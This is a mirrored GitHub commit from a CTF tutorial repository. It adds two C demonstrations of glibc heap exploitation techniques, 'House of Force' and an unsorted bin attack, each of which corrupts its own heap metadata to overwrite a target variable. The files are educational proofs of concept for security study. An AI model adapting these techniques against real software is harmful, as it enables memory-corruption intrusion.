mirror of
https://github.com/nganhkhoa/CTF-All-In-One.git
synced 2025-06-24 04:05:03 +07:00
update 3.3.7
This commit is contained in:
39
src/Others/3.3.5_heap_exploit/house_of_force.c
Normal file
39
src/Others/3.3.5_heap_exploit/house_of_force.c
Normal file
@ -0,0 +1,39 @@
|
||||
#include <stdio.h>
|
||||
#include <stdint.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <stdint.h>
|
||||
#include <malloc.h>
|
||||
|
||||
char bss_var[] = "This is a string that we want to overwrite.";
|
||||
|
||||
int main() {
|
||||
fprintf(stderr, "We will overwrite a variable at %p\n\n", bss_var);
|
||||
|
||||
intptr_t *p1 = malloc(0x10);
|
||||
int real_size = malloc_usable_size(p1);
|
||||
memset(p1, 'A', real_size);
|
||||
fprintf(stderr, "Let's allocate the first chunk of 0x10 bytes: %p.\n", p1);
|
||||
fprintf(stderr, "Real size of our allocated chunk is 0x%x.\n\n", real_size);
|
||||
|
||||
intptr_t *ptr_top = (intptr_t *) ((char *)p1 + real_size);
|
||||
fprintf(stderr, "Overwriting the top chunk size with a big value so the malloc will never call mmap.\n");
|
||||
fprintf(stderr, "Old size of top chunk: %#llx\n", *((unsigned long long int *)ptr_top));
|
||||
ptr_top[0] = -1;
|
||||
fprintf(stderr, "New size of top chunk: %#llx\n", *((unsigned long long int *)ptr_top));
|
||||
|
||||
unsigned long evil_size = (unsigned long)bss_var - sizeof(long)*2 - (unsigned long)ptr_top;
|
||||
fprintf(stderr, "\nThe value we want to write to at %p, and the top chunk is at %p, so accounting for the header size, we will malloc %#lx bytes.\n", bss_var, ptr_top, evil_size);
|
||||
void *new_ptr = malloc(evil_size);
|
||||
int real_size_new = malloc_usable_size(new_ptr);
|
||||
memset((char *)new_ptr + real_size_new - 0x20, 'A', 0x20);
|
||||
fprintf(stderr, "As expected, the new pointer is at the same place as the old top chunk: %p\n", new_ptr);
|
||||
|
||||
void* ctr_chunk = malloc(0x30);
|
||||
fprintf(stderr, "malloc(0x30) => %p!\n", ctr_chunk);
|
||||
fprintf(stderr, "\nNow, the next chunk we overwrite will point at our target buffer, so we can overwrite the value.\n");
|
||||
|
||||
fprintf(stderr, "old string: %s\n", bss_var);
|
||||
strcpy(ctr_chunk, "YEAH!!!");
|
||||
fprintf(stderr, "new string: %s\n", bss_var);
|
||||
}
|
20
src/Others/3.3.5_heap_exploit/unsorted_bin_attack.c
Normal file
20
src/Others/3.3.5_heap_exploit/unsorted_bin_attack.c
Normal file
@ -0,0 +1,20 @@
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
|
||||
int main() {
|
||||
unsigned long stack_var = 0;
|
||||
fprintf(stderr, "The target we want to rewrite on stack: %p -> %ld\n\n", &stack_var, stack_var);
|
||||
|
||||
unsigned long *p = malloc(0x80);
|
||||
unsigned long *p1 = malloc(0x10);
|
||||
fprintf(stderr, "Now, we allocate first small chunk on the heap at: %p\n",p);
|
||||
|
||||
free(p);
|
||||
fprintf(stderr, "We free the first chunk now. Its bk pointer point to %p\n", (void*)p[1]);
|
||||
|
||||
p[1] = (unsigned long)(&stack_var - 2);
|
||||
fprintf(stderr, "We write it with the target address-0x10: %p\n\n", (void*)p[1]);
|
||||
|
||||
malloc(0x80);
|
||||
fprintf(stderr, "Let's malloc again to get the chunk we just free: %p -> %p\n", &stack_var, (void*)stack_var);
|
||||
}
|
Reference in New Issue
Block a user